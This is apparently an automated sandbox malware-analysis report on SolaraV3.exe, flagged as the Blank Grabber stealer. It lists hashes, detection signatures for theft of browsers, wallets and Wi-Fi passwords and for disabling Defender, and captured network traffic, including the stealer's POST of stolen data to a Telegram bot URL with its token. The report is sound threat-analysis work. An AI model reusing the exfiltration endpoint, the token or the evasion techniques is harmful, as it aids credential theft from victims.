Windows Analysis Report
SolaraV3.exe

Overview

General Information

Sample name: SolaraV3.exe
Analysis ID: 1525849
MD5: 7dd77a8611b56c1ed090293e3ab40f08
SHA1: 1cb4be6453ab5dbeebd8339e0ec4264d6efa611c
SHA256: 5d887dd72893e3bd40b291a1dc3ea2bc94f6d0daf4de318bd1005b57fbe114ca
Tags: exe, user-aachum

Detection

Blank Grabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Modifies the hosts file
Potentially malicious time measurement code found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Use Short Name Path in Command Line
Steals Internet Explorer cookies
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

AV Detection

Source: SolaraV3.exe ReversingLabs: Detection: 55%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE8901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext, 110_2_00007FF74EE8901C
Source: SolaraV3.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: SolaraV3.exe, 00000002.00000002.2054170176.00007FFB1E4C1000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SolaraV3.exe, 00000002.00000002.2046985205.00007FFB0B7FC000.00000040.00000001.01000000.00000013.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SolaraV3.exe, 00000001.00000003.1559590237.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2053703446.00007FFB1C3C1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.1.dr
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051655996.00007FFB0C5F1000.00000040.00000001.01000000.00000006.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051929047.00007FFB18B71000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SolaraV3.exe
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: SolaraV3.exe, 00000002.00000002.2049056875.00007FFB0BECF000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053917460.00007FFB1E471000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdb source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdbhP@ source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053371221.00007FFB1C251000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SolaraV3.exe, 00000002.00000002.2052555001.00007FFB1AB01000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2052925726.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006E.00000000.1923151482.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe, 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe.1.dr
Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050619713.00007FFB0C411000.00000040.00000001.01000000.0000000E.sdmp
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC709280 FindFirstFileExW,FindClose, 1_2_00007FF6DC709280
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 1_2_00007FF6DC7083C0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 1_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 1_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC709280 FindFirstFileExW,FindClose, 2_2_00007FF6DC709280
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 2_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 2_2_00007FF6DC7083C0
Source: C:\Users\user\Desktop\SolaraV3.exe Code function: 2_2_00007FFB0B81322E MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFB2AD9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte, 2_2_00007FFB0B81322E
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE946EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 110_2_00007FF74EE946EC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EED88E0 FindFirstFileExA, 110_2_00007FF74EED88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe Code function: 110_2_00007FF74EE8E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle, 110_2_00007FF74EE8E21C
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
Source: C:\Users\user\Desktop\SolaraV3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales

Networking

Source: Network traffic Suricata IDS: 2857751 - Severity 1 - ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST) : 192.168.2.7:49733 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2857752 - Severity 1 - ETPRO MALWARE SynthIndi Loader CnC Response : 149.154.167.220:443 -> 192.168.2.7:49733
Source: unknown DNS query: name: api.telegram.org
Source: Joe Sandbox View IP Address: 208.95.112.1
Source: Joe Sandbox View ASN Name: TUT-ASUS
Source: unknown DNS query: name: ip-api.com
Source: unknown DNS query: name: ip-api.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
Source: global traffic HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: global traffic DNS traffic detected: DNS query: blank-a0m8c.in
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot7576687091:AAHc9LHp1oJNmPES1PMfu8JQQ9jVtHibTlc/sendDocument HTTP/1.1Host: api.telegram.orgAccept-Encoding: identityContent-Length: 727354User-Agent: python-urllib3/2.2.3Content-Type: multipart/form-data; boundary=1c1a3fa26118796b784a6413d888e095
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.co
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr, _lzma.pyd.1.dr, _decimal.pyd.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: SolaraV3.exe, 00000002.00000003.2036193521.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1921552847.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1772675599.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708990356.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2038979504.000001FC252B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: SolaraV3.exe, rar.exe.1.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: SolaraV3.exe, 00000002.00000002.2039145947.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039829113.000001FC2536E000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2035293287.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2039554025.000001FC25361000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2035172460.000001FC25320000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1728427931.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1708604492.000001FC252EE000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2034874254.000001FC25360000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1684359906.000001FC2531E000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1743305378.000001FC252ED000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2035050176.000001FC2536A000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.2036060899.000001FC25325000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000003.1695774309.000001FC252E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1794892126.00000267C15D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001A.00000002.2811239822.000001407C800000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000004A.00000002.1908054026.00000239FE760000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: SolaraV3.exe String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: SolaraV3.exe String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: SolaraV3.exe, 00000001.00000002.2058209847.000001EA23108000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.j$
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563354403.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, rar.exe.1.dr, libffi-7.dll.1.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: powershell.exe, 0000004A.00000002.1908054026.00000239FE760000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: svchost.exe, 0000001A.00000002.2811239822.000001407C800000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, 